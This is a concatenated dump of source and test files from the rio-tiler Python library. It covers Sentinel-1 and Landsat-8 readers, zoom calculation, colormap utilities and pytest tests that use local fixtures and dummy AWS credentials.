src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],
ensure_global_max_zoom: bool = False,
tilesize: int = 256,
) -> Tuple[int, int]:
"""
Calculate raster min/max mercator zoom level.
Parameters
----------
src_dst: rasterio.io.DatasetReader
Rasterio io.DatasetReader object
ensure_global_max_zoom: bool, optional
Apply latitude correction factor to ensure max_zoom equality for global
datasets covering different latitudes (default: False).
tilesize: int, optional
Mercator tile size (default: 256).
Returns
-------
min_zoom, max_zoom: Tuple
Min/Max Mercator zoom levels.
"""
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
center = [(bounds[0] + bounds[2]) / 2, (bounds[1] + bounds[3]) / 2]
lat = center[1] if ensure_global_max_zoom else 0
dst_affine, w, h = calculate_default_transform(
src_dst.crs,
constants.WEB_MERCATOR_CRS,
src_dst.width,
src_dst.height,
*src_dst.bounds,
)
mercator_resolution = max(abs(dst_affine[0]), abs(dst_affine[4]))
# Correction factor for web-mercator projection latitude scale change
latitude_correction_factor = math.cos(math.radians(lat))
adjusted_resolution = mercator_resolution * latitude_correction_factor
max_zoom = zoom_for_pixelsize(adjusted_resolution, tilesize=tilesize)
ovr_resolution = adjusted_resolution * max(h, w) / tilesize
min_zoom = zoom_for_pixelsize(ovr_resolution, tilesize=tilesize)
return (min_zoom, max_zoom)
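# Worked example, illustrative only: at the equator with the default 256 px
# tile size, zoom 0 resolves to (2 * pi * 6378137) / 256 ~= 156543 m/px,
# and each zoom level halves that.
if __name__ == "__main__":  # pragma: no cover
    print(_meters_per_pixel(0))    # ~156543.03
    print(zoom_for_pixelsize(10))  # 13: one below the first zoom finer than 10 m/px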
|
mvmendes/rio-tiler
|
rio_tiler/io/sentinel1.py
|
"""rio_tiler.io.sentinel1: Sentinel-1 processing."""
import json
import os
import re
from concurrent import futures
from typing import Any, Dict, Sequence, Tuple, Union
import numpy
import rasterio
from boto3.session import Session as boto3_session
from rasterio import transform
from rasterio.vrt import WarpedVRT
from rio_tiler import constants, reader
from rio_tiler.errors import InvalidBandName, InvalidSentinelSceneId
REGION = os.environ.get("AWS_REGION", "eu-central-1")
SENTINEL_BANDS = ["vv", "vh"]
def _aws_get_object(
bucket: str,
key: str,
request_pays: bool = True,
client: boto3_session.client = None,
) -> bytes:
"""AWS s3 get object content."""
if not client:
session = boto3_session(region_name=REGION)
client = session.client("s3")
params = {"Bucket": bucket, "Key": key}
if request_pays:
params["RequestPayer"] = "requester"
response = client.get_object(**params)
return response["Body"].read()
def sentinel1_parser(sceneid: str) -> Dict:
"""
Parse Sentinel-1 scene id.
Attributes
----------
sceneid : str
Sentinel-1 sceneid.
Returns
-------
out : dict
dictionary with metadata constructed from the sceneid.
"""
if not re.match(
"^S1[AB]_(IW)|(EW)_[A-Z]{3}[FHM]_[0-9][SA][A-Z]{2}_[0-9]{8}T[0-9]{6}_[0-9]{8}T[0-9]{6}_[0-9A-Z]{6}_[0-9A-Z]{6}_[0-9A-Z]{4}$",
sceneid,
):
raise InvalidSentinelSceneId("Could not match {}".format(sceneid))
sentinel_pattern = (
r"^S"
r"(?P<sensor>\w{1})"
r"(?P<satellite>[AB]{1})"
r"_"
r"(?P<beam>[A-Z]{2})"
r"_"
r"(?P<product>[A-Z]{3})"
r"(?P<resolution>[FHM])"
r"_"
r"(?P<processing_level>[0-9])"
r"(?P<product_class>[SA])"
r"(?P<polarisation>(SH)|(SV)|(DH)|(DV)|(HH)|(HV)|(VV)|(VH))"
r"_"
r"(?P<startDateTime>[0-9]{8}T[0-9]{6})"
r"_"
r"(?P<stopDateTime>[0-9]{8}T[0-9]{6})"
r"_"
r"(?P<absolute_orbit>[0-9]{6})"
r"_"
r"(?P<mission_task>[0-9A-Z]{6})"
r"_"
r"(?P<product_id>[0-9A-Z]{4})$"
)
meta: Dict[str, Any] = re.match(
sentinel_pattern, sceneid, re.IGNORECASE
).groupdict()
meta["scene"] = sceneid
year = meta["startDateTime"][0:4]
month = meta["startDateTime"][4:6].strip("0")
day = meta["startDateTime"][6:8].strip("0")
meta["scheme"] = "s3"
meta["bucket"] = "sentinel-s1-l1c"
meta["prefix"] = os.path.join(
meta["product"], year, month, day, meta["beam"], meta["polarisation"], sceneid
)
return meta
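# For example, the scene id used in the test suite parses to (abridged):
#   sentinel1_parser("S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B")
#   -> beam "IW", product "GRD", polarisation "DV", bucket "sentinel-s1-l1c",
#      prefix "GRD/2018/7/16/IW/DV/<the full scene id>"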
def _get_bounds(scene_info: Dict) -> Tuple[float, float, float, float]:
bucket, prefix = scene_info["bucket"], scene_info["prefix"]
product_info = json.loads(_aws_get_object(bucket, f"{prefix}/productInfo.json"))
xyz = list(zip(*product_info["footprint"]["coordinates"][0]))
return min(xyz[0]), min(xyz[1]), max(xyz[0]), max(xyz[1])
def bounds(sceneid: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
sceneid : str
Sentinel-1 sceneid.
Returns
-------
out : dict
dictionary with image bounds.
"""
scene_params = sentinel1_parser(sceneid)
return dict(sceneid=sceneid, bounds=_get_bounds(scene_params))
def metadata(
sceneid: str,
pmin: float = 2.0,
pmax: float = 98.0,
bands: Union[Sequence[str], str] = None,
hist_options: Dict = {},
**kwargs,
) -> Dict:
"""
Retrieve image bounds and band statistics.
Attributes
----------
sceneid : str
Sentinel-1 sceneid.
pmin : float, optional, (default: 2.)
Histogram minimum cut.
pmax : float, optional, (default: 98.)
Histogram maximum cut.
bands: tuple, str, required
Bands name (e.g vv, vh).
kwargs : optional
These are passed to 'rio_tiler.utils._stats'
e.g: bins=20, range=(0, 1000)
Returns
-------
out : dict
Dictionary with image bounds and bands statistics.
"""
if not bands:
raise InvalidBandName("bands is required")
if isinstance(bands, str):
bands = (bands,)
for band in bands:
if band not in SENTINEL_BANDS:
raise InvalidBandName("{} is not a valid Sentinel band name".format(band))
scene_params = sentinel1_parser(sceneid)
sentinel_prefix = "{scheme}://{bucket}/{prefix}/measurement".format(**scene_params)
def worker(band: str):
asset = "{}/{}-{}.tiff".format(
sentinel_prefix, scene_params["beam"].lower(), band
)
with rasterio.open(asset) as src_dst:
with WarpedVRT(
src_dst,
src_crs=src_dst.gcps[1],
src_transform=transform.from_gcps(src_dst.gcps[0]),
src_nodata=0,
) as vrt_dst:
return reader.metadata(
vrt_dst,
percentiles=(pmin, pmax),
hist_options=hist_options,
**kwargs,
)
with futures.ThreadPoolExecutor(max_workers=constants.MAX_THREADS) as executor:
responses = list(executor.map(worker, bands))
info = dict(
sceneid=sceneid,
bounds=responses[0]["bounds"],
band_descriptions=[(ix + 1, b) for ix, b in enumerate(bands)],
)
info["statistics"] = {
b: v for b, d in zip(bands, responses) for _, v in d["statistics"].items()
}
return info
def tile(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = None,
tilesize: int = 256,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from Sentinel-1 data.
Attributes
----------
sceneid : str
        Sentinel-1 sceneid.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands: tuple, str, required
Bands name (e.g vv, vh).
tilesize : int, optional (default: 256)
Output image size.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if not bands:
raise InvalidBandName("bands is required")
if isinstance(bands, str):
bands = (bands,)
for band in bands:
if band not in SENTINEL_BANDS:
raise InvalidBandName("{} is not a valid Sentinel band name".format(band))
scene_params = sentinel1_parser(sceneid)
sentinel_prefix = "{scheme}://{bucket}/{prefix}/measurement".format(**scene_params)
def worker(band: str):
asset = "{}/{}-{}.tiff".format(
sentinel_prefix, scene_params["beam"].lower(), band
)
with rasterio.open(asset) as src_dst:
with WarpedVRT(
src_dst,
src_crs=src_dst.gcps[1],
src_transform=transform.from_gcps(src_dst.gcps[0]),
src_nodata=0,
) as vrt_dst:
return reader.tile(
vrt_dst, tile_x, tile_y, tile_z, tilesize=tilesize, **kwargs
)
with futures.ThreadPoolExecutor(max_workers=constants.MAX_THREADS) as executor:
data, masks = zip(*list(executor.map(worker, bands)))
data = numpy.concatenate(data)
mask = numpy.all(masks, axis=0).astype(numpy.uint8) * 255
return data, mask
|
mvmendes/rio-tiler
|
tests/test_io_cogeo.py
|
"""tests rio_tiler.base"""
import os
import pytest
from rio_tiler import constants
from rio_tiler.errors import TileOutsideBounds
from rio_tiler.io import cogeo
PREFIX = os.path.join(os.path.dirname(__file__), "fixtures")
ADDRESS = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
PREFIX
)
COG_TAGS = os.path.join(os.path.dirname(__file__), "fixtures", "cog_tags.tif")
@pytest.fixture(autouse=True)
def testing_env_var(monkeypatch):
"""Set fake env to make sure we don't hit AWS services."""
monkeypatch.setenv("AWS_ACCESS_KEY_ID", "jqt")
monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "rde")
monkeypatch.delenv("AWS_PROFILE", raising=False)
monkeypatch.setenv("AWS_CONFIG_FILE", "/tmp/noconfigheere")
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", "/tmp/noconfighereeither")
monkeypatch.setenv("GDAL_DISABLE_READDIR_ON_OPEN", "EMPTY_DIR")
def test_spatial_info_valid():
"""Should work as expected (get spatial info)"""
meta = cogeo.spatial_info(ADDRESS)
assert meta.get("address")
assert meta.get("minzoom")
assert meta.get("maxzoom")
assert meta.get("center")
assert len(meta.get("bounds")) == 4
def test_bounds_valid():
"""Should work as expected (get bounds)"""
meta = cogeo.bounds(ADDRESS)
assert meta.get("address") == ADDRESS
assert len(meta.get("bounds")) == 4
def test_info_valid():
"""Should work as expected (get file info)"""
meta = cogeo.info(COG_TAGS)
assert meta.get("address") == COG_TAGS
assert meta.get("bounds")
assert meta.get("minzoom")
assert meta.get("maxzoom")
assert meta.get("band_descriptions")
assert meta.get("dtype") == "int16"
assert meta.get("colorinterp") == ["gray"]
assert meta.get("nodata_type") == "Nodata"
assert meta.get("scale")
assert meta.get("offset")
assert meta.get("band_metadata")
bmeta = meta.get("band_metadata")[0][1]
assert bmeta.get("STATISTICS_MAXIMUM")
assert bmeta.get("STATISTICS_MEAN")
assert bmeta.get("STATISTICS_MINIMUM")
def test_metadata_valid():
"""Get bounds and get stats for all bands."""
meta = cogeo.metadata(ADDRESS)
assert meta["address"] == ADDRESS
assert len(meta["band_descriptions"]) == 3
assert (1, "band1") == meta["band_descriptions"][0]
assert len(meta["statistics"].items()) == 3
assert meta["statistics"][1]["pc"] == [12, 198]
def test_metadata_valid_custom():
"""Get bounds and get stats for all bands with custom percentiles."""
meta = cogeo.metadata(
ADDRESS, pmin=5, pmax=90, hist_options=dict(bins=20), max_size=128
)
assert meta["address"] == ADDRESS
assert len(meta["statistics"].items()) == 3
assert len(meta["statistics"][1]["histogram"][0]) == 20
assert meta["statistics"][1]["pc"] == [41, 184]
def test_tile_valid_default():
"""Should return a 3 bands array and a full valid mask."""
tile_z = 21
tile_x = 438217
tile_y = 801835
data, mask = cogeo.tile(ADDRESS, tile_x, tile_y, tile_z)
assert data.shape == (3, 256, 256)
assert mask.all()
def test_tile_invalid_bounds():
"""Should raise an error with invalid tile."""
tile_z = 19
tile_x = 554
tile_y = 200458
with pytest.raises(TileOutsideBounds):
cogeo.tile(ADDRESS, tile_x, tile_y, tile_z)
def test_point_valid():
"""Read point."""
lon = -104.77499638118547
lat = 38.953606785685125
assert cogeo.point(ADDRESS, lon, lat)
def test_area_valid():
"""Read part of an image."""
bbox = (
-104.77506637573242,
38.95353532141205,
-104.77472305297852,
38.95366881479647,
)
data, mask = cogeo.area(ADDRESS, bbox)
assert data.shape == (3, 100, 199)
data, mask = cogeo.area(ADDRESS, bbox, max_size=100)
assert data.shape == (3, 51, 100)
data, mask = cogeo.area(ADDRESS, bbox, dst_crs=constants.WGS84_CRS)
assert data.shape == (3, 82, 210)
def test_preview_valid():
"""Read preview."""
data, mask = cogeo.preview(ADDRESS, max_size=128)
assert data.shape == (3, 78, 128)
|
mvmendes/rio-tiler
|
tests/test_utils.py
|
"""tests rio_tiler.utils"""
import os
import mercantile
import numpy as np
import pytest
import rasterio
from mock import patch
from rio_tiler import colormap, constants, utils
from .conftest import requires_webp
S3_KEY = "hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif"
S3_KEY_ALPHA = "hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1_alpha.tif"
S3_KEY_MASK = "hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1_mask.tif"
S3_LOCAL = PREFIX = os.path.join(os.path.dirname(__file__), "fixtures", "my-bucket")
S3_PATH = os.path.join(S3_LOCAL, S3_KEY)
S3_ALPHA_PATH = os.path.join(S3_LOCAL, S3_KEY_ALPHA)
S3_MASK_PATH = os.path.join(S3_LOCAL, S3_KEY_MASK)
KEY_PIX4D = "pix4d/pix4d_alpha_nodata.tif"
PIX4D_PATH = os.path.join(S3_LOCAL, KEY_PIX4D)
COG_DST = os.path.join(os.path.dirname(__file__), "fixtures", "cog_name.tif")
COG_WEB_TILED = os.path.join(os.path.dirname(__file__), "fixtures", "web.tif")
COG_NOWEB = os.path.join(os.path.dirname(__file__), "fixtures", "noweb.tif")
NOCOG = os.path.join(os.path.dirname(__file__), "fixtures", "nocog.tif")
@pytest.fixture(autouse=True)
def testing_env_var(monkeypatch):
"""Set fake env to make sure we don't hit AWS services."""
monkeypatch.setenv("AWS_ACCESS_KEY_ID", "jqt")
monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "rde")
monkeypatch.delenv("AWS_PROFILE", raising=False)
monkeypatch.setenv("AWS_CONFIG_FILE", "/tmp/noconfigheere")
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", "/tmp/noconfighereeither")
monkeypatch.setenv("GDAL_DISABLE_READDIR_ON_OPEN", "EMPTY_DIR")
def test_linear_rescale_valid():
"""Should work as expected (read data band)."""
data = np.zeros((1, 1), dtype=np.int16) + 1000
expected_value = np.zeros((1, 1), dtype=np.int16) + 25.5
assert (
utils.linear_rescale(data, in_range=(0, 10000), out_range=(0, 255))
== expected_value
)
def test_tile_exists_valid():
"""Should work as expected (return true)."""
tile = "7-36-50"
tile_z, tile_x, tile_y = map(int, tile.split("-"))
bounds = [-78.75, 34.30714385628803, -75.93749999999999, 36.59788913307021]
assert utils.tile_exists(bounds, tile_z, tile_x, tile_y)
def test_mapzen_elevation_rgb():
"""Should work as expected."""
arr = np.random.randint(0, 3000, size=(512, 512))
assert utils.mapzen_elevation_rgb(arr).shape == (3, 512, 512)
@patch("rio_tiler.io.landsat8.tile")
def test_expression_ndvi(landsat_tile):
"""Should work as expected"""
landsat_tile.return_value = [
np.random.randint(0, 255, size=(2, 256, 256), dtype=np.uint8),
np.random.randint(0, 1, size=(256, 256), dtype=np.uint8) * 255,
]
expr = "(b5 - b4) / (b5 + b4)"
tile_z = 8
tile_x = 71
tile_y = 102
sceneid = "LC08_L1TP_016037_20170813_20170814_01_RT"
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
    assert data.shape == (1, 256, 256)
    assert mask.shape == (256, 256)
assert len(landsat_tile.call_args[1].get("bands")) == 2
@patch("rio_tiler.io.sentinel2.tile")
def test_expression_sentinel2(sentinel2):
"""Should work as expected."""
sentinel2.return_value = [
np.random.randint(0, 255, size=(2, 256, 256), dtype=np.uint8),
np.random.randint(0, 1, size=(256, 256), dtype=np.uint8) * 255,
]
expr = "(b8A - b12) / (b8A + b12)"
tile_z = 8
tile_x = 71
tile_y = 102
sceneid = "S2A_tile_20170323_17SNC_0"
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
    assert data.shape == (1, 256, 256)
    assert mask.shape == (256, 256)
assert sorted(list(sentinel2.call_args[1].get("bands"))) == ["12", "8A"]
@patch("rio_tiler.io.landsat8.tile")
def test_expression_landsat_rgb(landsat_tile):
"""Should work as expected."""
landsat_tile.return_value = [
np.random.randint(0, 255, size=(3, 256, 256), dtype=np.uint8),
np.random.randint(0, 1, size=(256, 256), dtype=np.uint8) * 255,
]
expr = "b5*0.8, b4*1.1, b3*0.8"
tile_z = 8
tile_x = 71
tile_y = 102
sceneid = "LC08_L1TP_016037_20170813_20170814_01_RT"
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
    assert data.shape == (3, 256, 256)
    assert mask.shape == (256, 256)
assert len(landsat_tile.call_args[1].get("bands")) == 3
@patch("rio_tiler.io.cbers.tile")
def test_expression_cbers_rgb(cbers_tile):
"""Should read tile from CBERS data."""
cbers_tile.return_value = [
np.random.randint(0, 255, size=(3, 256, 256), dtype=np.uint8),
np.random.randint(0, 1, size=(256, 256), dtype=np.uint8) * 255,
]
expr = "b8*0.8, b7*1.1, b6*0.8"
tile_z = 10
tile_x = 664
tile_y = 495
sceneid = "CBERS_4_MUX_20171121_057_094_L2"
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
    assert data.shape == (3, 256, 256)
    assert mask.shape == (256, 256)
assert len(cbers_tile.call_args[1].get("bands")) == 3
def test_expression_main_ratio():
"""Should work as expected."""
expr = "(b3 - b2) / (b3 + b2)"
tile_z = 19
tile_x = 109554
tile_y = 200458
prefix = os.path.join(os.path.dirname(__file__), "fixtures")
sceneid = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
prefix
)
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
    assert data.shape == (1, 256, 256)
    assert mask.shape == (256, 256)
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr=expr)
    assert data.shape == (1, 256, 256)
    assert mask.shape == (256, 256)
def test_expression_main_rgb():
"""Should work as expected."""
expr = "b1*0.8, b2*1.1, b3*0.8"
tile_z = 19
tile_x = 109554
tile_y = 200458
prefix = os.path.join(os.path.dirname(__file__), "fixtures")
sceneid = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
prefix
)
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
    assert data.shape == (3, 256, 256)
    assert mask.shape == (256, 256)
def test_expression_main_kwargs():
"""Should work as expected."""
expr = "(b3 - b2) / (b3 + b2)"
tile_z = 19
tile_x = 109554
tile_y = 200458
prefix = os.path.join(os.path.dirname(__file__), "fixtures")
sceneid = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
prefix
)
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr, tilesize=512)
    assert data.shape == (1, 512, 512)
    assert mask.shape == (512, 512)
def test_expression_missing():
"""Should raise an exception on missing expression."""
tile_z = 19
tile_x = 109554
tile_y = 200458
prefix = os.path.join(os.path.dirname(__file__), "fixtures")
sceneid = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
prefix
)
with pytest.raises(Exception):
utils.expression(sceneid, tile_x, tile_y, tile_z, tilesize=512)
def test_get_vrt_transform_valid():
"""Should return correct transform and size."""
bounds = (
-11663507.036777973,
4715018.0897710975,
-11663487.927520901,
4715037.199028169,
)
with rasterio.open(S3_PATH) as src:
vrt_transform, vrt_width, vrt_height = utils.get_vrt_transform(
src, bounds, 64, 64
)
assert vrt_transform[2] == -11663507.036777973
assert vrt_transform[5] == 4715037.199028169
assert vrt_width == 100
assert vrt_height == 100
vrt_transform, vrt_width, vrt_height = utils.get_vrt_transform(
src, bounds, 256, 256
)
assert vrt_transform[2] == -11663507.036777973
assert vrt_transform[5] == 4715037.199028169
assert vrt_width == 256
assert vrt_height == 256
def test_get_vrt_transform_valid4326():
"""Should return correct transform and size."""
bounds = (
-104.77523803710938,
38.95353532141205,
-104.77455139160156,
38.954069293441066,
)
with rasterio.open(S3_PATH) as src:
vrt_transform, vrt_width, vrt_height = utils.get_vrt_transform(
src, bounds, 256, 256, dst_crs=constants.WGS84_CRS
)
assert vrt_transform[2] == -104.77523803710938
assert vrt_transform[5] == 38.954069293441066
assert vrt_width == 420
assert vrt_height == 327
def test_statsFunction_valid():
"""Should return a valid dict with array statistics."""
with rasterio.open(S3_ALPHA_PATH) as src:
arr = src.read(indexes=[1], masked=True)
stats = utils._stats(arr)
assert stats["pc"] == [10, 200]
assert stats["min"] == 0
assert stats["max"] == 254
assert int(stats["std"]) == 55
assert len(stats["histogram"]) == 2
assert len(stats["histogram"][0]) == 10
stats = utils._stats(arr, percentiles=(5, 95))
assert stats["pc"] == [31, 195]
stats = utils._stats(arr, percentiles=(5, 95), bins=20)
assert len(stats["histogram"][0]) == 20
def test_render_valid_1band():
"""Creates PNG image buffer from one band array."""
arr = np.random.randint(0, 255, size=(512, 512), dtype=np.uint8)
assert utils.render(arr)
def test_render_valid_colormap():
"""Creates 'colormaped' PNG image buffer from one band array."""
arr = np.random.randint(0, 255, size=(1, 512, 512), dtype=np.uint8)
mask = np.zeros((512, 512), dtype=np.uint8)
cmap = colormap.get_colormap("cfastie")
assert utils.render(arr, mask, colormap=cmap, img_format="jpeg")
def test_render_valid_colormapDict():
"""Create 'colormaped' PNG image buffer from one band array using discrete cmap."""
arr = np.random.randint(0, 255, size=(1, 512, 512), dtype=np.uint8)
cmap = {
1: [255, 255, 255, 255],
50: [255, 255, 0, 255],
100: [255, 0, 0, 255],
150: [0, 0, 255, 255],
}
assert utils.render(arr, colormap=cmap)
def test_render_valid_mask():
"""Creates image buffer from 3 bands array and mask."""
arr = np.random.randint(0, 255, size=(3, 512, 512), dtype=np.uint8)
mask = np.zeros((512, 512), dtype=np.uint8)
assert utils.render(arr, mask=mask)
assert utils.render(arr, mask=mask, img_format="jpeg")
def test_render_valid_options():
"""Creates image buffer with driver options."""
arr = np.random.randint(0, 255, size=(3, 512, 512), dtype=np.uint8)
mask = np.zeros((512, 512), dtype=np.uint8) + 255
assert utils.render(arr, mask=mask, img_format="png", ZLEVEL=9)
def test_render_geotiff16Bytes():
"""Creates GeoTIFF image buffer from 3 bands array."""
arr = np.random.randint(0, 255, size=(3, 512, 512), dtype=np.uint16)
mask = np.zeros((512, 512), dtype=np.uint8) + 255
assert utils.render(arr, mask=mask, img_format="GTiff")
def test_render_geotiff():
"""Creates GeoTIFF image buffer from 3 bands array."""
arr = np.random.randint(0, 255, size=(3, 512, 512), dtype=np.uint8)
mask = np.zeros((512, 512), dtype=np.uint8) + 255
ops = utils.geotiff_options(1, 0, 0)
assert utils.render(arr, mask=mask, img_format="GTiff", **ops)
@requires_webp
def test_render_valid_1bandWebp():
"""Creates WEBP image buffer from 1 band array."""
arr = np.random.randint(0, 255, size=(1, 512, 512), dtype=np.uint8)
assert utils.render(arr, img_format="WEBP")
def test_aligned_with_internaltile():
"""Check if COG is in WebMercator and aligned with internal tiles."""
bounds = mercantile.bounds(43, 25, 7)
with rasterio.open(COG_DST) as src_dst:
assert not utils._requested_tile_aligned_with_internal_tile(
src_dst, bounds, 256, 256
)
with rasterio.open(NOCOG) as src_dst:
assert not utils._requested_tile_aligned_with_internal_tile(
src_dst, bounds, 256, 256
)
bounds = mercantile.bounds(147, 182, 9)
with rasterio.open(COG_NOWEB) as src_dst:
assert not utils._requested_tile_aligned_with_internal_tile(
src_dst, bounds, 256, 256
)
with rasterio.open(COG_WEB_TILED) as src_dst:
assert utils._requested_tile_aligned_with_internal_tile(
src_dst, bounds, 256, 256
)
def test_find_non_alpha():
"""Return valid indexes."""
with rasterio.open(S3_ALPHA_PATH) as src_dst:
assert utils.non_alpha_indexes(src_dst) == (1, 2, 3)
with rasterio.open(PIX4D_PATH) as src_dst:
assert utils.non_alpha_indexes(src_dst) == (1, 2, 3)
def test_has_alpha():
"""Check if rasters have alpha bands."""
with rasterio.open(S3_ALPHA_PATH) as src_dst:
assert utils.has_alpha_band(src_dst)
with rasterio.open(COG_DST) as src_dst:
assert not utils.has_alpha_band(src_dst)
def test_has_mask():
"""Should return True."""
with rasterio.open(S3_MASK_PATH) as src_dst:
assert utils.has_mask_band(src_dst)
with rasterio.open(COG_DST) as src_dst:
assert not utils.has_mask_band(src_dst)
def test_chunks():
    """Should split a list into multiple chunks."""
    chunks = list(utils._chunks(list(range(10)), 3))
    assert len(chunks) == 4
def test_div():
"""Should return up rounded value."""
assert utils._div_round_up(3, 2) == 2
assert utils._div_round_up(2, 2) == 1
def test_ovr_level():
"""Should return the correct overview level."""
with rasterio.open(COG_DST) as src_dst:
# raw/-1: 2667x2658 0: 1329x1334, 1: 665x667, 2: 333x334, 3: 167x167
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 100, 100, dst_crs=src_dst.crs
)
== 3
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 200, 200, dst_crs=src_dst.crs
)
== 2
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 500, 500, dst_crs=src_dst.crs
)
== 1
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 800, 800, dst_crs=src_dst.crs
)
== 0
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 1500, 1500, dst_crs=src_dst.crs
)
== -1
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 3000, 3000, dst_crs=src_dst.crs
)
== -1
)
|
mvmendes/rio-tiler
|
rio_tiler/colormap.py
|
"""rio-tiler colormap functions."""
import os
from typing import Dict, Sequence, Tuple
import numpy
EMPTY_COLORMAP: Dict = {i: [0, 0, 0, 0] for i in range(256)}
def _update_alpha(cmap: Dict, idx: Sequence[int], alpha: int = 0) -> None:
"""Update the alpha value of a colormap index."""
if isinstance(idx, int):
idx = (idx,)
for i in idx:
cmap[i] = cmap[i][0:3] + [alpha]
def _remove_value(cmap: Dict, idx: Sequence[int]) -> None:
"""Remove value from a colormap dict."""
if isinstance(idx, int):
idx = (idx,)
for i in idx:
cmap.pop(i, None)
def _update_cmap(cmap: Dict, values: Dict) -> None:
"""Update a colormap dict."""
for i, color in values.items():
if len(color) == 3:
color += [255]
cmap[i] = color
def get_colormap(name: str) -> Dict:
"""
Return colormap dict.
Attributes
----------
name : str, optional
Colormap name (default: cfastie)
Returns
-------
colormap : dict
GDAL RGBA Color Table dictionary.
"""
cmap_file = os.path.join(os.path.dirname(__file__), "cmap", f"{name.lower()}.npy")
cmap = numpy.load(cmap_file)
assert cmap.shape == (256, 4)
assert cmap.dtype == numpy.uint8
return {idx: value.tolist() for idx, value in enumerate(cmap)}
# From https://github.com/mojodna/marblecutter/blob/5b9040ba6c83562a465eabdbb6e8959e6a8bf041/marblecutter/utils.py#L35
def make_lut(colormap: Dict) -> numpy.ndarray:
"""
Create a lookup table numpy.ndarray from a GDAL RGBA Color Table dictionary.
Attributes
----------
colormap : dict
GDAL RGBA Color Table dictionary.
Returns
-------
lut : numpy.ndarray
colormap lookup table
"""
lut = numpy.zeros(shape=(256, 4), dtype=numpy.uint8)
for i, color in colormap.items():
lut[int(i)] = color
return lut
def apply_cmap(
data: numpy.ndarray, colormap: Dict
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Apply colormap on tile data.
Attributes
----------
data : numpy ndarray
1D image array to translate to RGB.
colormap : dict
GDAL RGBA Color Table dictionary.
Returns
-------
data : numpy.ndarray
RGB data.
mask: numpy.ndarray
Alpha band.
"""
if data.shape[0] > 1:
raise Exception("Source data must be 1 band")
lookup_table = make_lut(colormap)
data = lookup_table[data[0], :]
data = numpy.transpose(data, [2, 0, 1])
return data[:-1], data[-1]
def apply_discrete_cmap(
data: numpy.ndarray, colormap: Dict
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Apply discrete colormap.
Note: This method is not used by default and left
to users to use within custom render methods.
Attributes
----------
data : numpy ndarray
1D image array to translate to RGB.
color_map: dict
Discrete ColorMap dictionary
e.g:
{
1: [255, 255, 255],
2: [255, 0, 0]
}
Returns
-------
arr: numpy.ndarray
"""
res = numpy.zeros((data.shape[1], data.shape[2], 4), dtype=numpy.uint8)
for k, v in colormap.items():
res[data[0] == k] = v
data = numpy.transpose(res, [2, 0, 1])
return data[:-1], data[-1]
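# Illustrative usage sketch (not part of the original module): colormap a
# single-band uint8 array with the bundled "cfastie" color table.
if __name__ == "__main__":
    arr = numpy.random.randint(0, 255, size=(1, 64, 64), dtype=numpy.uint8)
    rgb, alpha = apply_cmap(arr, get_colormap("cfastie"))
    print(rgb.shape, alpha.shape)  # (3, 64, 64) (64, 64)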
|
mvmendes/rio-tiler
|
rio_tiler/io/landsat8.py
|
<gh_stars>0
"""rio_tiler.io.landsat8: Landsat-8 processing."""
import datetime
import os
import re
from concurrent import futures
from typing import Any, Dict, Sequence, Tuple, Union
from urllib.request import urlopen
import numpy
import rasterio
from rasterio.warp import transform_bounds
from rio_toa import brightness_temp, reflectance, toa_utils
from rio_tiler import constants, reader
from rio_tiler.errors import InvalidBandName, InvalidLandsatSceneId, TileOutsideBounds
from rio_tiler.utils import _stats as raster_stats
from rio_tiler.utils import pansharpening_brovey, tile_exists
LANDSAT_BANDS = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "QA"]
def landsat_parser(sceneid: str) -> Dict:
"""
Parse Landsat-8 scene id.
Author @perrygeo - http://www.perrygeo.com
Attributes
----------
sceneid : str
Landsat sceneid.
Returns
-------
out : dict
dictionary with metadata constructed from the sceneid.
"""
pre_collection = r"(L[COTEM]8\d{6}\d{7}[A-Z]{3}\d{2})"
collection_1 = r"(L[COTEM]08_L\d{1}[A-Z]{2}_\d{6}_\d{8}_\d{8}_\d{2}_(T1|T2|RT))"
    if not re.match("^(?:{}|{})$".format(pre_collection, collection_1), sceneid):
raise InvalidLandsatSceneId("Could not match {}".format(sceneid))
